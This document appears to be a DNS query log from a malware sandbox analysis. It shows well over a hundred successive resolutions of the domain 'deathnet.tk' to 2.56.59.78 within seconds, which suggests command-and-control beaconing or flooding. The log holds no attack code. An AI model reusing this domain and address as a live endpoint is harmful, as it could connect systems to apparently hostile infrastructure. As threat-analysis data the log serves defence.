              Mar 21, 2022 20:07:54.032270908 CET8.8.8.8192.168.2.230xfdc4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.077564955 CET8.8.8.8192.168.2.230xde25No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.120130062 CET8.8.8.8192.168.2.230x5ca3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.163577080 CET8.8.8.8192.168.2.230xfd7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.206835985 CET8.8.8.8192.168.2.230xedf6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.250037909 CET8.8.8.8192.168.2.230x2ab5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.295504093 CET8.8.8.8192.168.2.230x7334No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.340455055 CET8.8.8.8192.168.2.230x6c5bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.385540009 CET8.8.8.8192.168.2.230xef4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.428723097 CET8.8.8.8192.168.2.230xafdbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.474306107 CET8.8.8.8192.168.2.230x344bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.517802000 CET8.8.8.8192.168.2.230x6205No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.566356897 CET8.8.8.8192.168.2.230xdeb3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.611800909 CET8.8.8.8192.168.2.230x16a8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.654814959 CET8.8.8.8192.168.2.230x60b6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.697488070 CET8.8.8.8192.168.2.230xdc4aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.742767096 CET8.8.8.8192.168.2.230xb2d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.788594007 CET8.8.8.8192.168.2.230xb2a1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.832906008 CET8.8.8.8192.168.2.230xaf6dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.876002073 CET8.8.8.8192.168.2.230x4cc5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.921988964 CET8.8.8.8192.168.2.230x6145No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:54.966593981 CET8.8.8.8192.168.2.230x767fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.009716034 CET8.8.8.8192.168.2.230xdec2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.054472923 CET8.8.8.8192.168.2.230xe7d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.099196911 CET8.8.8.8192.168.2.230xe971No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.144615889 CET8.8.8.8192.168.2.230x46d4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.190243959 CET8.8.8.8192.168.2.230x62f5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.233962059 CET8.8.8.8192.168.2.230x5d3cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.276539087 CET8.8.8.8192.168.2.230x1c75No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.321216106 CET8.8.8.8192.168.2.230x7748No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.366779089 CET8.8.8.8192.168.2.230xe551No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.409693956 CET8.8.8.8192.168.2.230x32faNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.454397917 CET8.8.8.8192.168.2.230x98bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.497942924 CET8.8.8.8192.168.2.230xf2cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.541707039 CET8.8.8.8192.168.2.230x131bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.586519003 CET8.8.8.8192.168.2.230xa9ddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.630768061 CET8.8.8.8192.168.2.230x4c49No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.675456047 CET8.8.8.8192.168.2.230x13a0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.721451998 CET8.8.8.8192.168.2.230xb9a9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.765507936 CET8.8.8.8192.168.2.230xf9e0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.810664892 CET8.8.8.8192.168.2.230xf24eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.855612993 CET8.8.8.8192.168.2.230x1bc0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.900850058 CET8.8.8.8192.168.2.230x5d6fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.943355083 CET8.8.8.8192.168.2.230xdb50No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:55.987596035 CET8.8.8.8192.168.2.230xcd98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.033013105 CET8.8.8.8192.168.2.230xb1a3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.076564074 CET8.8.8.8192.168.2.230xddf0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.122003078 CET8.8.8.8192.168.2.230xfe01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.168487072 CET8.8.8.8192.168.2.230x3cf7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.211671114 CET8.8.8.8192.168.2.230x713bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.256242990 CET8.8.8.8192.168.2.230x85f4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.300904036 CET8.8.8.8192.168.2.230xbd81No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.345572948 CET8.8.8.8192.168.2.230x1b7fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.391516924 CET8.8.8.8192.168.2.230xf93eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.437364101 CET8.8.8.8192.168.2.230xc3c2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.483063936 CET8.8.8.8192.168.2.230x9488No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.525749922 CET8.8.8.8192.168.2.230xeb13No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.570844889 CET8.8.8.8192.168.2.230xcda3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.615397930 CET8.8.8.8192.168.2.230x39d1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.658603907 CET8.8.8.8192.168.2.230x57c6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.703195095 CET8.8.8.8192.168.2.230xaf53No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.747692108 CET8.8.8.8192.168.2.230x532aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.793730021 CET8.8.8.8192.168.2.230xc0baNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.836628914 CET8.8.8.8192.168.2.230x12a3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.881561041 CET8.8.8.8192.168.2.230x4b3aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.926816940 CET8.8.8.8192.168.2.230xdaddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:56.972450018 CET8.8.8.8192.168.2.230x7496No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.018821955 CET8.8.8.8192.168.2.230x147dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.063982010 CET8.8.8.8192.168.2.230x97efNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.109395027 CET8.8.8.8192.168.2.230x5989No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.157490015 CET8.8.8.8192.168.2.230x4931No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.200119019 CET8.8.8.8192.168.2.230x5792No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.245446920 CET8.8.8.8192.168.2.230xcd6cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.291342974 CET8.8.8.8192.168.2.230x5abNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.335273027 CET8.8.8.8192.168.2.230x5269No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.380840063 CET8.8.8.8192.168.2.230x62e4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.423434973 CET8.8.8.8192.168.2.230xb762No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.475357056 CET8.8.8.8192.168.2.230xdf67No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.520045996 CET8.8.8.8192.168.2.230x6895No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.566941977 CET8.8.8.8192.168.2.230x1cc4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.615473032 CET8.8.8.8192.168.2.230xe558No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.660831928 CET8.8.8.8192.168.2.230xc4c3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.707237959 CET8.8.8.8192.168.2.230xe392No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.752966881 CET8.8.8.8192.168.2.230xc724No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.797748089 CET8.8.8.8192.168.2.230xe01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.843686104 CET8.8.8.8192.168.2.230x7c2eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.890765905 CET8.8.8.8192.168.2.230x78eeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.935148001 CET8.8.8.8192.168.2.230xcb7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:57.980199099 CET8.8.8.8192.168.2.230x59f9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.028625965 CET8.8.8.8192.168.2.230xb149No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.073926926 CET8.8.8.8192.168.2.230xb81cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.124532938 CET8.8.8.8192.168.2.230xaef9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.170578957 CET8.8.8.8192.168.2.230xde01No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.215723038 CET8.8.8.8192.168.2.230xf1bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.258876085 CET8.8.8.8192.168.2.230x1cdfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.301588058 CET8.8.8.8192.168.2.230xaef8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.344688892 CET8.8.8.8192.168.2.230x5c7eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.390083075 CET8.8.8.8192.168.2.230xa7fcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.433592081 CET8.8.8.8192.168.2.230x85ccNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.478512049 CET8.8.8.8192.168.2.230x30abNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.521948099 CET8.8.8.8192.168.2.230xe776No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.569792986 CET8.8.8.8192.168.2.230x2e44No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.617053986 CET8.8.8.8192.168.2.230xc8eeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.661809921 CET8.8.8.8192.168.2.230x9126No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.706975937 CET8.8.8.8192.168.2.230xcdf3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.752141953 CET8.8.8.8192.168.2.230x8aecNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.798554897 CET8.8.8.8192.168.2.230x1fd5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.845004082 CET8.8.8.8192.168.2.230xd33fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.891844034 CET8.8.8.8192.168.2.230x5338No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.934577942 CET8.8.8.8192.168.2.230x9d80No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:58.979949951 CET8.8.8.8192.168.2.230xfc97No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.026741028 CET8.8.8.8192.168.2.230xf0bcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.072184086 CET8.8.8.8192.168.2.230xb92eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.117372036 CET8.8.8.8192.168.2.230x9460No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.163009882 CET8.8.8.8192.168.2.230x560dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.207576036 CET8.8.8.8192.168.2.230x7d76No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.253324986 CET8.8.8.8192.168.2.230xc08aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.298191071 CET8.8.8.8192.168.2.230xa66fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.343254089 CET8.8.8.8192.168.2.230x51aaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.388040066 CET8.8.8.8192.168.2.230xfc7fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.435353041 CET8.8.8.8192.168.2.230x898cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.482013941 CET8.8.8.8192.168.2.230xa28bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.528613091 CET8.8.8.8192.168.2.230x7016No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.571650028 CET8.8.8.8192.168.2.230x2c26No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.617770910 CET8.8.8.8192.168.2.230x896dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.662841082 CET8.8.8.8192.168.2.230x545cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.707765102 CET8.8.8.8192.168.2.230x309aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.754550934 CET8.8.8.8192.168.2.230xb17fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.800164938 CET8.8.8.8192.168.2.230x9791No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.853020906 CET8.8.8.8192.168.2.230xd2e8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.898283005 CET8.8.8.8192.168.2.230xb411No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.943303108 CET8.8.8.8192.168.2.230x2bc0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:07:59.987068892 CET8.8.8.8192.168.2.230x8d69No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.040028095 CET8.8.8.8192.168.2.230x52deNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.082909107 CET8.8.8.8192.168.2.230x2fe1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.126244068 CET8.8.8.8192.168.2.230xa904No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.171084881 CET8.8.8.8192.168.2.230x2c99No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.216867924 CET8.8.8.8192.168.2.230xfbd0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.261410952 CET8.8.8.8192.168.2.230xb1fcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.304961920 CET8.8.8.8192.168.2.230xd72fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.349627972 CET8.8.8.8192.168.2.230xe158No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.392692089 CET8.8.8.8192.168.2.230xb5c9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.437486887 CET8.8.8.8192.168.2.230x7ddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.482877016 CET8.8.8.8192.168.2.230xbcd4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.528032064 CET8.8.8.8192.168.2.230x183No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.573474884 CET8.8.8.8192.168.2.230x1ee0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.625696898 CET8.8.8.8192.168.2.230xd933No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.670949936 CET8.8.8.8192.168.2.230x3181No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.716517925 CET8.8.8.8192.168.2.230x32ecNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.766386986 CET8.8.8.8192.168.2.230x3daeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.809595108 CET8.8.8.8192.168.2.230x86a3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.855248928 CET8.8.8.8192.168.2.230xf989No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.898823023 CET8.8.8.8192.168.2.230x93dbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.942367077 CET8.8.8.8192.168.2.230xed04No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:00.989157915 CET8.8.8.8192.168.2.230x36fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.032128096 CET8.8.8.8192.168.2.230x92e3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.076224089 CET8.8.8.8192.168.2.230x712dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.123711109 CET8.8.8.8192.168.2.230x4543No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.167658091 CET8.8.8.8192.168.2.230x6d32No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.213587046 CET8.8.8.8192.168.2.230x9a0fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.256583929 CET8.8.8.8192.168.2.230x8df4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.300007105 CET8.8.8.8192.168.2.230x310eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.347151041 CET8.8.8.8192.168.2.230x37beNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.393306971 CET8.8.8.8192.168.2.230x48f2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.438756943 CET8.8.8.8192.168.2.230xbfdfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.486068010 CET8.8.8.8192.168.2.230x2aefNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.537961006 CET8.8.8.8192.168.2.230x4e0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.585114956 CET8.8.8.8192.168.2.230x26cdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.630305052 CET8.8.8.8192.168.2.230xa6cdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.673713923 CET8.8.8.8192.168.2.230x3bc0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.723324060 CET8.8.8.8192.168.2.230xeaabNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.776997089 CET8.8.8.8192.168.2.230x8bafNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.830328941 CET8.8.8.8192.168.2.230xa8b0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.879221916 CET8.8.8.8192.168.2.230x527eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.925223112 CET8.8.8.8192.168.2.230xdf0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:01.971671104 CET8.8.8.8192.168.2.230x25acNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.016731977 CET8.8.8.8192.168.2.230xb5f7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.064399004 CET8.8.8.8192.168.2.230x7a39No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.110066891 CET8.8.8.8192.168.2.230x8c0bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.157036066 CET8.8.8.8192.168.2.230xc5b0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.206069946 CET8.8.8.8192.168.2.230xfd4dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.250760078 CET8.8.8.8192.168.2.230x174aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.294758081 CET8.8.8.8192.168.2.230x5045No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.340493917 CET8.8.8.8192.168.2.230x6f68No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.388755083 CET8.8.8.8192.168.2.230xa9cfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.433779001 CET8.8.8.8192.168.2.230x8ffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.479384899 CET8.8.8.8192.168.2.230xbf78No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.525424004 CET8.8.8.8192.168.2.230x5a00No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.570281982 CET8.8.8.8192.168.2.230xed90No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.615394115 CET8.8.8.8192.168.2.230xb3bfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.661858082 CET8.8.8.8192.168.2.230x1951No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.706073046 CET8.8.8.8192.168.2.230x470cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.752985001 CET8.8.8.8192.168.2.230x6733No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.795870066 CET8.8.8.8192.168.2.230xe1faNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.838764906 CET8.8.8.8192.168.2.230x9326No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.883222103 CET8.8.8.8192.168.2.230x5648No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.927614927 CET8.8.8.8192.168.2.230xb6eaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:02.972917080 CET8.8.8.8192.168.2.230x76eeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:03.020764112 CET8.8.8.8192.168.2.230x89c8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
